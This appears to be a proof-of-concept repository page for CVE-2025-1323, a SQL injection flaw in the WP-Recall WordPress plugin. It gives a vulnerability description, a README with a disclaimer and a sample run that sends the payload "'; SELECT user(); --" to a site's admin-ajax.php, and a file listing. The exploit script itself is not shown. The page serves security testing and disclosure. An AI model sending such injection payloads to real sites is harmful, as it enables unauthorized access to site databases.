CVE-2025-1323 PoC — WordPress plugin WP-Recall SQL Injection Vulnerability

Source
Associated Vulnerability
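Title: WordPress plugin WP-Recall SQL Injection Vulnerability (CVE-2025-1323)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP. The platform supports setting up personal blog sites on servers running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin WP-Recall versions 16.26.10 and earlier contain a SQL injection vulnerability. It stems from insufficient escaping of user-supplied parameters and insufficient preparation of SQL queries, and may allow unauthenticated attackers to append SQL queries to extract sensitive information.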
Description
WP-Recall Plugin SQL Injection 
Readme
# cve-2025-1323
WP-Recall Plugin SQL Injection 

## ⚠️ Legal Disclaimer

This tool is intended for **authorized security testing and educational use only**.  
Do not use against systems without explicit permission. Misuse may be illegal.

## ✅ Requirements

- Python 3.x
- `requests` module

Install dependencies:

```bash
pip install requests
```

```bash
python CVE-2025-1323.py

Enter target URL (e.g. https://target.com/wp-admin/admin-ajax.php): https://example.com/wp-admin/admin-ajax.php
Enter ajax_nonce value: 37c11b0c06

[*] Sending payload: '; SELECT user(); --

[+] Response received:
{"result":"SQL error or leaked data here..."}
```

File Snapshot

[4.0K] /data/pocs/df5ad22914ccf5568c2385bc7711c25e494edfc4
├── [1.5K] CVE-2025-1323.py
└── [ 637] README.md

0 directories, 2 files